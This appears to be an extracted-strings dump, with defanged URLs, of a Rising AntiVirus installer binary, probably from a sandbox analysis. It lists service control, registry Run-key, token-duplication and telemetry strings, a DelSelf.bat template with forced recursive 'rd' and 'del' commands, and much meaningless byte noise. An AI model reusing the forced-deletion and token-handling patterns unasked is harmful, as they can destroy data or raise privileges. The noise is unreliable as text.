hXXp://ts-ocsp.ws.symantec.com07
hXXp://ts-ocsp.ws.symantec.com07
hXXp://ts-aia.ws.symantec.com/tss-ca-g2.cer0
hXXp://ts-aia.ws.symantec.com/tss-ca-g2.cer0
hXXp://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
hXXp://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
.Class 3 Public Primary Certification Authority0
.Class 3 Public Primary Certification Authority0
hXXp://crl.verisign.com/pca3.crl0
hXXp://crl.verisign.com/pca3.crl0
hXXps://VVV.verisign.com/cps0
hXXps://VVV.verisign.com/cps0
#hXXp://logo.verisign.com/vslogo.gif04
#hXXp://logo.verisign.com/vslogo.gif04
hXXp://ocsp.verisign.com0>
hXXp://ocsp.verisign.com0>
2Terms of use at hXXps://VVV.verisign.com/rpa (c)101.0,
2Terms of use at hXXps://VVV.verisign.com/rpa (c)101.0,
hXXp://sf.symcb.com/sf.crl0f
hXXp://sf.symcb.com/sf.crl0f
hXXps://d.symcb.com/cps0%
hXXps://d.symcb.com/cps0%
hXXps://d.symcb.com/rpa0
hXXps://d.symcb.com/rpa0
hXXp://sf.symcd.com0&
hXXp://sf.symcd.com0&
hXXp://sf.symcb.com/sf.crt0
hXXp://sf.symcb.com/sf.crt0
hXXps://VVV.verisign.com/cps0*
hXXps://VVV.verisign.com/cps0*
hXXps://VVV.verisign.com/rpa0
hXXps://VVV.verisign.com/rpa0
#hXXp://crl.verisign.com/pca3-g5.crl04
#hXXp://crl.verisign.com/pca3-g5.crl04
hXXp://ocsp.verisign.com0
hXXp://ocsp.verisign.com0
DhXXp://crl.microsoft.com/pki/crl/products/MicrosoftCodeVerifRoot.crl0
DhXXp://crl.microsoft.com/pki/crl/products/MicrosoftCodeVerifRoot.crl0
z.oao
z.oao
].XcG
].XcG
~jq.wz
~jq.wz
.FDF`O
.FDF`O
;.bd/
;.bd/
:U%SN
:U%SN
ej.CC
ej.CC
`X.UT?.
`X.UT?.
.lqwD
.lqwD
*e_!.sWI$`
*e_!.sWI$`
]>!.gB
]>!.gB
k.Rrt
k.Rrt
TCP_yy
TCP_yy
%S5]*
%S5]*
.fb#c$Z4
.fb#c$Z4
h[%D}_
h[%D}_
$T.Ia
$T.Ia
V.jurV
V.jurV
Sù,
Sù,
T%xYS3
T%xYS3
9kl.Uw
9kl.Uw
We]%F
We]%F
u.zQ0
u.zQ0
4\ R%d
4\ R%d
.qJ4C9.
.qJ4C9.
T@M.Ng
T@M.Ng
y.Di
y.Di
vJY.lNk'1
vJY.lNk'1
.Gi#O$@$
.Gi#O$@$
~D.Hh
~D.Hh
U.LZe
U.LZe
yo.NRL;
yo.NRL;
.npr =
.npr =
y/"Z.Jn(
y/"Z.Jn(
Diurl
Diurl
A.Ot=_d
A.Ot=_d
.psd x
.psd x
}.eNk^6E
}.eNk^6E
@%X;g
@%X;g
~gq%c^
~gq%c^
;.Aum
;.Aum
_6}"%_^&
_6}"%_^&
36.hU
36.hU
S}i;%u
S}i;%u
$.dls
$.dls
iY.Ub
iY.Ub
%cUNX
%cUNX
EHJJGA[.Oj
EHJJGA[.Oj
S.lW"
S.lW"
.hw1.
.hw1.
.CB5t
.CB5t
.MAF!
.MAF!
|%X3j
|%X3j
.aRSr
.aRSr
".xNT
".xNT
3.Mh)
3.Mh)
X2.Wq
X2.Wq
B%.GMK
B%.GMK
8&H8.VW
8&H8.VW
a%s%s
a%s%s
.dk:8e`
.dk:8e`
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\RsdSfxTmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\RsdSfxTmp
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download\install1393485.exe
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download\install1393485.exe
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
@.reloc
@.reloc
QSVSSSh
QSVSSSh
>%uPV
>%uPV
|$D.tD
|$D.tD
.tgPV
.tgPV
FTPjK
FTPjK
FtPj;
FtPj;
C.PjRVj
C.PjRVj
u.VV3
u.VV3
|$$vL9|$ u%Sh
|$$vL9|$ u%Sh
Advapi32.dll
Advapi32.dll
Explorer.exe
Explorer.exe
NtDll.dll
NtDll.dll
%d %d %d %d
%d %d %d %d
Failed to call WTSQueryUserToken, err= 0x%x
Failed to call WTSQueryUserToken, err= 0x%x
wtsapi32.DLL
wtsapi32.DLL
Could not open pipe
Could not open pipe
SetNamedPipeHandleState failed
SetNamedPipeHandleState failed
\\.\pipe\RISING_RSD_BU
\\.\pipe\RISING_RSD_BU
%*.*f
%*.*f
/RUNAS %s
/RUNAS %s
Failed to load psapi.dll.
Failed to load psapi.dll.
Psapi.dll
Psapi.dll
Setup.exe End with ErrorCode: 0xX
Setup.exe End with ErrorCode: 0xX
hXXp://center.rising.com.cn/LogCenter.asp?info=%s
hXXp://center.rising.com.cn/LogCenter.asp?info=%s
Key=%s&v1=%s&v2=%s&v3=%s&v4=%s&v5=%s
Key=%s&v1=%s&v2=%s&v3=%s&v4=%s&v5=%s
Password
Password
Port
Port
%s\Data\%s\%s.ini
%s\Data\%s\%s.ini
setup.exe
setup.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\
%s(%s)
%s(%s)
ReportView
ReportView
KERNEL32.DLL
KERNEL32.DLL
SetWillReboot(%d)
SetWillReboot(%d)
Failed to call QueryServiceStatus(RSD)! Err Code: %d
Failed to call QueryServiceStatus(RSD)! Err Code: %d
Failed to call OpenService(RSD)! Err Code: %d
Failed to call OpenService(RSD)! Err Code: %d
Failed to call OpenSCManager! Err Code: %d
Failed to call OpenSCManager! Err Code: %d
\RsTest.ini
\RsTest.ini
ÞSKTOP%
ÞSKTOP%
\label.dat
\label.dat
\Backup.ini
\Backup.ini
\Export.ini
\Export.ini
\XMLS\RSSetup.xml
\XMLS\RSSetup.xml
\Setup.exe
\Setup.exe
\*.exe
\*.exe
\XMLS\Setup.xml
\XMLS\Setup.xml
\os.xml
\os.xml
/PASS=
/PASS=
/PRODUCT=%s
/PRODUCT=%s
/LANG=%d
/LANG=%d
HKEY_LOCAL_MACHINE\SoftWare\Rising\%s
HKEY_LOCAL_MACHINE\SoftWare\Rising\%s
ITEM%d
ITEM%d
UPDATEXMLURL
UPDATEXMLURL
d-d-- d:d
d-d-- d:d
Setup.dll
Setup.dll
Local_RSD_Setup_%s
Local_RSD_Setup_%s
Global\Rising_RSD_Setup_%s
Global\Rising_RSD_Setup_%s
Rising_RSD_Setup_%s
Rising_RSD_Setup_%s
\Backup\RSD\RSSetup\RSSetup.xml
\Backup\RSD\RSSetup\RSSetup.xml
\RSSetup.xml
\RSSetup.xml
\CompsVer.inf
\CompsVer.inf
AddPCAExclude return: %d
AddPCAExclude return: %d
Open Key Failed!
Open Key Failed!
Create Key Failed!
Create Key Failed!
Query Value Failed! Return: %d
Query Value Failed! Return: %d
%s\Setup.exe
%s\Setup.exe
SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags
SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags
AddPCAExclude(%d)
AddPCAExclude(%d)
Setup.xml
Setup.xml
\Setup.xml
\Setup.xml
12345678.000
12345678.000
Create Temp Cfg From %s to %s
Create Temp Cfg From %s to %s
rd /q %s
rd /q %s
rd /s /q %s
rd /s /q %s
if exist %s goto repeat
if exist %s goto repeat
del /s /q /f %s
del /s /q /f %s
\DelSelf.bat
\DelSelf.bat
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
SetFileSecurity() failed. Error %d
SetFileSecurity() failed. Error %d
SetSecurityDescriptorControl() failed.Error %d
SetSecurityDescriptorControl() failed.Error %d
GetSecurityDescriptorControl() failed.Error %d
GetSecurityDescriptorControl() failed.Error %d
SetSecurityDescriptorDacl() failed. Error %d
SetSecurityDescriptorDacl() failed. Error %d
AddAce() failed. Error %d
AddAce() failed. Error %d
GetAce() failed. Error %d
GetAce() failed. Error %d
AddAccessAllowedAce() failed. Error %d
AddAccessAllowedAce() failed. Error %d
AddAccessAllowedAceEx() failed. Error %d
AddAccessAllowedAceEx() failed. Error %d
advapi32.dll
advapi32.dll
InitializeAcl() failed. Error %d
InitializeAcl() failed. Error %d
HeapAlloc() failed. Error %d
HeapAlloc() failed. Error %d
GetAclInformation() failed. Error %d
GetAclInformation() failed. Error %d
GetSecurityDescriptorDacl() failed. Error %d
GetSecurityDescriptorDacl() failed. Error %d
InitializeSecurityDescriptor() failed.Error %d
InitializeSecurityDescriptor() failed.Error %d
GetFileSecurity() failed. Error %d
GetFileSecurity() failed. Error %d
InitializeSid() failed. Error %d
InitializeSid() failed. Error %d
HKEY_LOCAL_MACHINE
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_USERS
HKEY_CURRENT_USER
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
HKEY_CLASSES_ROOT
WinSessionThread GetPidByName dwPID = %d , name=%s!
WinSessionThread GetPidByName dwPID = %d , name=%s!
WTSQueryUserToken Failed! Err Code: %d
WTSQueryUserToken Failed! Err Code: %d
OpenProcess Failed! Err Code: %d
OpenProcess Failed! Err Code: %d
GetProcAddress(OpenProcessToken) Failed! Err Code: %d
GetProcAddress(OpenProcessToken) Failed! Err Code: %d
OpenProcessToken Failed! Err Code: %d
OpenProcessToken Failed! Err Code: %d
GetLogonUserToken(%d)
GetLogonUserToken(%d)
CreateProcess2 Return: %d
CreateProcess2 Return: %d
LoadLibrary Failed! Err Code: %d
LoadLibrary Failed! Err Code: %d
CreateEnvironmentBlock Failed! Err Code: %d
CreateEnvironmentBlock Failed! Err Code: %d
DuplicateTokenEx Failed! Err Code: %d
DuplicateTokenEx Failed! Err Code: %d
CreateProcessWithTokenW Failed! Err Code: %d
CreateProcessWithTokenW Failed! Err Code: %d
Userenv.DLL
Userenv.DLL
GetFileAttributes %s return: %d
GetFileAttributes %s return: %d
Delete File %s fail, Err: %d
Delete File %s fail, Err: %d
Wow64DisableWow64FsRedirection Return: %d
Wow64DisableWow64FsRedirection Return: %d
Wow64RevertWow64FsRedirection Return: %d
Wow64RevertWow64FsRedirection Return: %d
RsInstallService(%s) Return: %d
RsInstallService(%s) Return: %d
ChangeServiceConfig Failed! Err Code: %d
ChangeServiceConfig Failed! Err Code: %d
CreateService Failed! Err Code: %d
CreateService Failed! Err Code: %d
OpenSCManager Failed! Err Code: %d
OpenSCManager Failed! Err Code: %d
RsInstallService(%s)
RsInstallService(%s)
RsUninstallService(%s) Return: %d
RsUninstallService(%s) Return: %d
DeleteService Failed! Err Code: %d
DeleteService Failed! Err Code: %d
OpenService Failed And Service Already Exist! Err Code: %d
OpenService Failed And Service Already Exist! Err Code: %d
RsUninstallService(%s)
RsUninstallService(%s)
OpenService Failed! Err Code: %d
OpenService Failed! Err Code: %d
LoadLibrary(Advapi32.dll) Failed!
LoadLibrary(Advapi32.dll) Failed!
RsSetServiceFailureAction(%s) Return: %d
RsSetServiceFailureAction(%s) Return: %d
GetProcAddress(%s) Failed!
GetProcAddress(%s) Failed!
ChangeServiceConfig2 Failed! Err Code: %d
ChangeServiceConfig2 Failed! Err Code: %d
RsSetServiceFailureAction(%s)
RsSetServiceFailureAction(%s)
QueryServiceStatus Failed! Err Code: %d
QueryServiceStatus Failed! Err Code: %d
StartService Failed! Err Code: %d
StartService Failed! Err Code: %d
RsStartService(%s)
RsStartService(%s)
Wait for Service %s Time Out!
Wait for Service %s Time Out!
QueryServiceStatus(%s) Failed! Err Code: %d
QueryServiceStatus(%s) Failed! Err Code: %d
ControlService(%s) SERVICE_CONTROL_STOP Failed! Err Code: %d
ControlService(%s) SERVICE_CONTROL_STOP Failed! Err Code: %d
HeapAlloc Failed! Err Code: %d
HeapAlloc Failed! Err Code: %d
EnumDependentServices Failed! Err Code: %d
EnumDependentServices Failed! Err Code: %d
Stop Service %s Dependencies...
Stop Service %s Dependencies...
%s's Stop is Pending...
%s's Stop is Pending...
Service %s is Stopped...
Service %s is Stopped...
OpenService(%s) Failed! Err Code: %d
OpenService(%s) Failed! Err Code: %d
RsStopService(%s)
RsStopService(%s)
Rs%sInstallCom(%s) Return: %d
Rs%sInstallCom(%s) Return: %d
LoadLibrary(%s) Failed!
LoadLibrary(%s) Failed!
%s Failed! ErrMsg: %s
%s Failed! ErrMsg: %s
Rs%sInstallCom(%s)...
Rs%sInstallCom(%s)...
WinSessionThread CreateProcess ret = %d end !
WinSessionThread CreateProcess ret = %d end !
WinSessionThread CreateProcess pid = %d, CreateProcessAsUser err = %d !
WinSessionThread CreateProcess pid = %d, CreateProcessAsUser err = %d !
WinSessionThread CreateProcess begin dwSessionID = %d!
WinSessionThread CreateProcess begin dwSessionID = %d!
WININIT.INI
WININIT.INI
\WININIT.INI
\WININIT.INI
HKEY_CURRENT_CONFIG
HKEY_CURRENT_CONFIG
"%s" %s
"%s" %s
\RsMgrSvc.ini
\RsMgrSvc.ini
Save DELETEPATH %s to RsMgrSvc.ini
Save DELETEPATH %s to RsMgrSvc.ini
Save REBOOTRUN %s to RsMgrSvc.ini
Save REBOOTRUN %s to RsMgrSvc.ini
%s Loaded By %s
%s Loaded By %s
EXPLORER.EXE
EXPLORER.EXE
Setup.exe Begin----------------------------------
Setup.exe Begin----------------------------------
HKEY_DYN_DATA
HKEY_DYN_DATA
HKEY_PERFORMANCE_DATA
HKEY_PERFORMANCE_DATA
StopComponent(%s)...
StopComponent(%s)...
StartComponent(%s)...
StartComponent(%s)...
Report Error!
Report Error!
Call Component %s Dll_PreHandle Return: 0xX
Call Component %s Dll_PreHandle Return: 0xX
Call Component %s Dll_PostHandle Return: 0xX
Call Component %s Dll_PostHandle Return: 0xX
Check XML File %s Failed
Check XML File %s Failed
Check File %s Failed
Check File %s Failed
BackUp XML File From: %s To %s
BackUp XML File From: %s To %s
Delete XML File: %s
Delete XML File: %s
Copy XML File From: %s To %s
Copy XML File From: %s To %s
%s\RsMgrsvc.ini
%s\RsMgrsvc.ini
URLInfoAbout
URLInfoAbout
hXXp://help.ikaka.com/
hXXp://help.ikaka.com/
"%s" /UNINSTALL /PRODUCT=%s
"%s" /UNINSTALL /PRODUCT=%s
"%s" /UNINSTALL /PRODUCT=RSD
"%s" /UNINSTALL /PRODUCT=RSD
Delete File %s
Delete File %s
Copy File From %s To %s
Copy File From %s To %s
CompsVer.inf
CompsVer.inf
Copy Path From %s To %s
Copy Path From %s To %s
Down Load %s To Path: %s
Down Load %s To Path: %s
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\windows\currentversion\run
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\windows\currentversion\run
RunFirstInstall Successfully...NeedReboot: %d
RunFirstInstall Successfully...NeedReboot: %d
InstallComponentList Failed! Error Code: 0xX
InstallComponentList Failed! Error Code: 0xX
PreHandleComponentList Failed! Error Code: 0xX
PreHandleComponentList Failed! Error Code: 0xX
Product_PreHandle Failed! Error Code: 0xX
Product_PreHandle Failed! Error Code: 0xX
BackUpComponentList Failed! Error Code: 0xX
BackUpComponentList Failed! Error Code: 0xX
CheckComponentList Failed! Error Code: 0xX
CheckComponentList Failed! Error Code: 0xX
RunFirstInstall, AfterReboot: %d
RunFirstInstall, AfterReboot: %d
RavTmp: %s
RavTmp: %s
file not exist : %s
file not exist : %s
succeed to download %s
succeed to download %s
Failed to download %s. ErrCode = %d; hr = %d
Failed to download %s. ErrCode = %d; hr = %d
Failed to verify %s
Failed to verify %s
%s%s/%s%s.inf
%s%s/%s%s.inf
Failed to get download url from %s
Failed to get download url from %s
URLLIST
URLLIST
Failed to load %s.
Failed to load %s.
%s%s/%s/%s/%s
%s%s/%s/%s/%s
%s\%s\%s\%s
%s\%s\%s\%s
%s%s/%s/%s
%s%s/%s/%s
%s\%s\%s
%s\%s\%s
Failed to get %s-ITEM.
Failed to get %s-ITEM.
Failed to get %s-FILES.
Failed to get %s-FILES.
Failed to get %s-COMPONENT.
Failed to get %s-COMPONENT.
Download %s retry > 3
Download %s retry > 3
%s/%s/%s_xml.zip
%s/%s/%s_xml.zip
%s\%s\%s.xml
%s\%s\%s.xml
%s%s/%s/%s.xml
%s%s/%s/%s.xml
Failed to get %s' newver from %s
Failed to get %s' newver from %s
SCMD
SCMD
REGVERKEY
REGVERKEY
REGKEYVALUE
REGKEYVALUE
REGKEYNAME
REGKEYNAME
REGKEY
REGKEY
Set File %s Everyone Access Rights 0xX return: %d
Set File %s Everyone Access Rights 0xX return: %d
Set File %s Users Access Rights 0xX return: %d
Set File %s Users Access Rights 0xX return: %d
Delete File Return: %d, NeedReboot: %d
Delete File Return: %d, NeedReboot: %d
Prepare To Delete File %s...
Prepare To Delete File %s...
Back Up File From: %s To: %s Return: %d
Back Up File From: %s To: %s Return: %d
Skip Backing Up File %s For Checked OK...
Skip Backing Up File %s For Checked OK...
Copy File Return: %d, NeedReboot: %d
Copy File Return: %d, NeedReboot: %d
MoveFile From %s To %s
MoveFile From %s To %s
Prepare To Copy File From %s To %s...
Prepare To Copy File From %s To %s...
TaskbarPin = 0x%x
TaskbarPin = 0x%x
Install Link: %s
Install Link: %s
Delete Link: %s
Delete Link: %s
TaskbarunPin = 0x%x
TaskbarunPin = 0x%x
Old Link File: %s
Old Link File: %s
SUBKEY
SUBKEY
Set Key %s Everyone Access Rights 0xX return: %d
Set Key %s Everyone Access Rights 0xX return: %d
Set Key %s Users Access Rights 0xX return: %d
Set Key %s Users Access Rights 0xX return: %d
REGKEYDATATYPE
REGKEYDATATYPE
Install Key KeyName: %s, ValueName: %s, Value: %s, DataType: %d Return: %d
Install Key KeyName: %s, ValueName: %s, Value: %s, DataType: %d Return: %d
Backup Key Value Return: %d
Backup Key Value Return: %d
microsoft\windows\currentversion\run
microsoft\windows\currentversion\run
Restore Key Value Return: %d
Restore Key Value Return: %d
UnInstall Key KeyName: %s, ValueName: %s Return: %d
UnInstall Key KeyName: %s, ValueName: %s Return: %d
Execute langsel.exe
Execute langsel.exe
langsel.exe
langsel.exe
Setup Log (*.log)
Setup Log (*.log)
*.log
*.log
A%d M
A%d M
ÚTADIR%
ÚTADIR%
Need Reboot, Add DeletePath Task To Server: %s
Need Reboot, Add DeletePath Task To Server: %s
No Reboot, RsDeletePath(%s)
No Reboot, RsDeletePath(%s)
\lics%d.txt
\lics%d.txt
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\
{X-X-X-XX-XXXXXX}.bmp
{X-X-X-XX-XXXXXX}.bmp
SOFTWARE\Microsoft\Windows NT\CurrentVersion
SOFTWARE\Microsoft\Windows NT\CurrentVersion
SHFolder.dll
SHFolder.dll
Shell32.dll
Shell32.dll
HKEY_LOCAL_MACHINE\%s\%s
HKEY_LOCAL_MACHINE\%s\%s
%snserver.exe
%snserver.exe
%sRsTest.ini
%sRsTest.ini
Software\Microsoft\Windows\CurrentVersion
Software\Microsoft\Windows\CurrentVersion
nserver.exe
nserver.exe
%FIRSTPART%
%FIRSTPART%
%COMMONDIR%
%COMMONDIR%
%DOMINODATA%
%DOMINODATA%
%DOMINODIR%
%DOMINODIR%
%SYSDIR64%
%SYSDIR64%
%SYSDIR%
%SYSDIR%
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
[INF]CRsConfigBase::InitializeRsConfig: GetPath(PathSize=%d),Result=0xX
[INF]CRsConfigBase::InitializeRsConfig: GetPath(PathSize=%d),Result=0xX
[ERR]CRsConfigBase::InitializeRsConfig: QueryInterface RSIID_IRSCfgMgr Failed(Result=0xX)!
[ERR]CRsConfigBase::InitializeRsConfig: QueryInterface RSIID_IRSCfgMgr Failed(Result=0xX)!
[ERR]CRsConfigBase::InitializeRsConfig:CreateAppEnv Failed(Result=0xX).
[ERR]CRsConfigBase::InitializeRsConfig:CreateAppEnv Failed(Result=0xX).
RsConfig.cfg
RsConfig.cfg
[ERR]CRsConfigBase::InitializeRsConfig:QueryInterface RSIID_IRSAppMgr failed(Result=0xX).
[ERR]CRsConfigBase::InitializeRsConfig:QueryInterface RSIID_IRSAppMgr failed(Result=0xX).
[ERR]CRsConfigBase::InitializeRsConfig:CreateObject RSID_RSAppMgr failed(Result=0xX).
[ERR]CRsConfigBase::InitializeRsConfig:CreateObject RSID_RSAppMgr failed(Result=0xX).
RSAPPMGR.DLL
RSAPPMGR.DLL
\RSAPPMGR.DLL
\RSAPPMGR.DLL
comx3.dll
comx3.dll
%s>
%s>
standalone="%s"
standalone="%s"
encoding="%s"
encoding="%s"
version="%s"
version="%s"
X;
X;
%s='%s'
%s='%s'
%s="%s"
%s="%s"
\RsLang.dll
\RsLang.dll
SYSTEM\CurrentControlSet\Services\Tcpip\Parameters
SYSTEM\CurrentControlSet\Services\Tcpip\Parameters
System\CurrentControlSet\Services\VxD\MSTCP
System\CurrentControlSet\Services\VxD\MSTCP
255.255.255.255
255.255.255.255
socket() failed; %d
socket() failed; %d
Range: bytes=%d-
Range: bytes=%d-
hXXp://
hXXp://
portuguese-brazilian
portuguese-brazilian
.rstmp
.rstmp
1.1.3
1.1.3
deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly
deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly
inflate 1.1.3 Copyright 1995-1998 Mark Adler
inflate 1.1.3 Copyright 1995-1998 Mark Adler
C:\DistributedAutoLink\Temp\CompileOutputDir\Setup.pdb
C:\DistributedAutoLink\Temp\CompileOutputDir\Setup.pdb
GetProcessHeap
GetProcessHeap
SetNamedPipeHandleState
SetNamedPipeHandleState
WaitNamedPipeA
WaitNamedPipeA
GetWindowsDirectoryA
GetWindowsDirectoryA
KERNEL32.dll
KERNEL32.dll
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
ExitWindowsEx
ExitWindowsEx
EnumWindows
EnumWindows
EnumChildWindows
EnumChildWindows
USER32.dll
USER32.dll
comdlg32.dll
comdlg32.dll
RegCloseKey
RegCloseKey
RegOpenKeyExA
RegOpenKeyExA
RegCreateKeyA
RegCreateKeyA
RegOpenKeyA
RegOpenKeyA
RegCreateKeyExA
RegCreateKeyExA
RegDeleteKeyA
RegDeleteKeyA
RegSetKeySecurity
RegSetKeySecurity
RegGetKeySecurity
RegGetKeySecurity
RegQueryInfoKeyA
RegQueryInfoKeyA
RegEnumKeyExA
RegEnumKeyExA
ADVAPI32.dll
ADVAPI32.dll
ShellExecuteExA
ShellExecuteExA
ShellExecuteA
ShellExecuteA
SHELL32.dll
SHELL32.dll
ole32.dll
ole32.dll
OLEAUT32.dll
OLEAUT32.dll
SHLWAPI.dll
SHLWAPI.dll
RPCRT4.dll
RPCRT4.dll
InternetCrackUrlA
InternetCrackUrlA
HttpQueryInfoA
HttpQueryInfoA
HttpSendRequestA
HttpSendRequestA
HttpAddRequestHeadersA
HttpAddRequestHeadersA
HttpOpenRequestA
HttpOpenRequestA
WININET.dll
WININET.dll
VERSION.dll
VERSION.dll
WSOCK32.dll
WSOCK32.dll
GetCPInfo
GetCPInfo
11166666600000000000000/////////.....""""""""""""""""--- .DDDDDDDDDDDDDDDDDDDDDDDDDDBBBBBB
11166666600000000000000/////////.....""""""""""""""""--- .DDDDDDDDDDDDDDDDDDDDDDDDDDBBBBBB
>VVVVVVVVVVVVYYYY:Y:YYV8888888888888.ppMs3llkxNqKKqK
>VVVVVVVVVVVVYYYY:Y:YYV8888888888888.ppMs3llkxNqKKqK
!'!555''''
!'!555''''
!! **""!
!! **""!
#### # # # # # # # #
#### # # # # # # # #
6,,,6,,6,66
6,,,6,,6,66
,,,,66,,6,
,,,,66,,6,
6,,,,6,,,
6,,,,6,,,
555555555555555
555555555555555
666666666666666666
666666666666666666
888888888
888888888
CC.CCCCCC6hML7L77L789;nOOOOOOOO8
CC.CCCCCC6hML7L77L789;nOOOOOOOO8
...CCCCCC6hMLL7777789;
...CCCCCC6hMLL7777789;
...CCCCCC6hML77777789;
...CCCCCC6hML77777789;
"""!"!"!"
"""!"!"!"
1111111111111000000
1111111111111000000
!%%&11&&&
!%%&11&&&
23333333333333333333
23333333333333333333
3333343333333333334
3333343333333333334
443434333333333333
443434333333333333
#34344443344333343
#34344443344333343
3444444444444
3444444444444
444444444444
444444444444
7676676676676676
7676676676676676
7777777777777
7777777777777
77777777777
77777777777
>889889889889883$3
>889889889889883$3
/2$ÝDD
/2$ÝDD
4::-...,..,,,, %
4::-...,..,,,, %
7766666666666666666666601$ÞDE
7766666666666666666666601$ÞDE
000000000000011110
000000000000011110
"#%DPTVVVVVVPO%%"L
"#%DPTVVVVVVPO%%"L
version="1.0.0.0"
version="1.0.0.0"
name="Microsoft.Windows.Common-Controls"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
publicKeyToken="6595b64144ccf1df"
6'6.6>6>7
6'6.6>6>7
2
9#939:9[9
; ;$;(;,;0;4;8;/hXXp://csc3-2010-crl.verisign.com/CSC3-2010.crl0DhXXp://ocsp.verisign.com0;/hXXp://csc3-2010-aia.verisign.com/CSC3-2010.cer0)rackUrl3&4{Z'rS%sT%sT%sT%sT$rR#sR"mNversion="1.0.0.0"name="Microsoft.Windows.Common-Controls"version="6.0.0.0"publicKeyToken="6595b64144ccf1df"It is strongly recommended to close all Windows program before running the setup program.Password:This module need %fM1.0.0.2Setup.EXE20140619153336140ECan't create the destination folder, please check and input it again.APlease take off your CD avoiding to restart from CDROM next time.Totally scaned %d files, found %d viruses.Export,Unable to Create File Folder: %s , continue?This version [version:%s] is older than your current installed [version:%s]Continue to install Rising AntiVirus Software[version:%s]?%Click "Next" to continue installationjSystem comctl32.dll version is lower than 4.70!\please upgrade it through installing IE4 or above version.KYou have install follow Rising product, this product can't install whit it.FLast Rising setup progress is not completed, please reboot your systemNRising Anti-virus software has been uninstalled successfully but follow files.!Version: %s Update Date: %s$Add or remove same component please!(%d second left to auto close this dialog8Rising Anti-virus software has been updated successfullyPassword is error7update is completed, windows need reboot for copy file.install1393485.exe_1148_rwx_00401000_001FC000:\rsdebug.inic:\%sdbghelp.dllkernel32.dll
d-d-d(d-d-d)
Kernel32.dll
\rsmain.exe
[d-d-d][d:d:d:d]
%s\%s
%s\*.*
C:\Temp
SOFTWARE\Rising\%s
2.log
[u]
[0xX]
RAV.INI
\Rs7zSfx.log
\setup.dll
CLSID\{CAA2D3B1-4BB5-4a45-A17A-122773379D99}
%s\CompsVer.inf
Setup.exe
%s\auto.ini
@Sleep...%d
%s Start
%s End
{E5C53971-D80E-4500-BE0D-761BF3CD8457}
Unsupported Method
Password is not defined
mscoree.dll
- This application cannot run using the active version of the Microsoft .NET Runtime
Please contact the application's support team for more information.
GetProcessWindowStation
user32.dll
internal state. The program cannot safely continue execution and must
continue execution and must now be terminated.
CLSID\{CAA2D3B2-4BB5-4a45-A17A-122773379D99}
XXXXXXXXXXX
{X-X-X-XX-XXXXXX}
\NetConfig.ini
{"vkey": "%s", "guid": "%s", "sguid": "%s", "actionid": "%s", "tag": "%s","step": "%s",
"result": "%s", "errorcode": "%s", "remark": "%s", "pa": "%s", "pb": "%s"}
Label.dat
hXXp://center.rising.com.cn/urg.asp?v=%s&t=%s&a=%s
%sbase
Iphlpapi.dll
\\.\PhysicalDrive%d
\\.\Scsi%d:
MSIE %d.%d
WININET.DLL
Windows
Windows Me
Windows 98
Windows 95
Windows NT %d.%d
%s:%d
Mozilla/4.0 (compatible; %s; %s; Rising)
Content-Type: application/x-www-form-urlencoded
HTTP/1.0
C:\DistributedAutoLink\Temp\CompileOutputDir\7zSfx.pdb
COMCTL32.dll
GDI32.dll
restorelog.txt
zcÁ
T3%dU
K.ZuNN
)$OI%f
B.Yo@
26.Ip
up.yF
~mM.Bv
qPndR.Ts
Thawte Certification1
hXXp://ocsp.thawte.com0
.hXXp://crl.thawte.com/ThawteTimestampingCA.crl0
hXXp://ts-ocsp.ws.symantec.com07
hXXp://ts-aia.ws.symantec.com/tss-ca-g2.cer0hXXp://ts-crl.ws.symantec.com/tss-ca-g2.crl0(.Class 3 Public Primary Certification Authority0hXXp://crl.verisign.com/pca3.crl0hXXps://VVV.verisign.com/cps0#hXXp://logo.verisign.com/vslogo.gif04hXXp://ocsp.verisign.com0>2Terms of use at hXXps://VVV.verisign.com/rpa (c)101.0,hXXp://sf.symcb.com/sf.crl0fhXXps://d.symcb.com/cps0%hXXps://d.symcb.com/rpa0hXXp://sf.symcd.com0&hXXp://sf.symcb.com/sf.crt0hXXps://VVV.verisign.com/cps0*hXXps://VVV.verisign.com/rpa0#hXXp://crl.verisign.com/pca3-g5.crl04hXXp://ocsp.verisign.com0DhXXp://crl.microsoft.com/pki/crl/products/MicrosoftCodeVerifRoot.crl0z.oao].XcG~jq.wz.FDF`O;.bd/:U%SNej.CC`X.UT?..lqwD*e_!.sWI$`]>!.gBk.RrtTCP_yy%S5]*.fb#c$Z4h[%D}_$T.IaV.jurVSù,T%xYS39kl.UwWe]%Fu.zQ04\ R%d.qJ4C9.T@M.Ngy.DivJY.lNk'1.Gi#O$@$~D.HhU.LZeyo.NRL;.npr =y/"Z.Jn(DiurlA.Ot=_d.psd 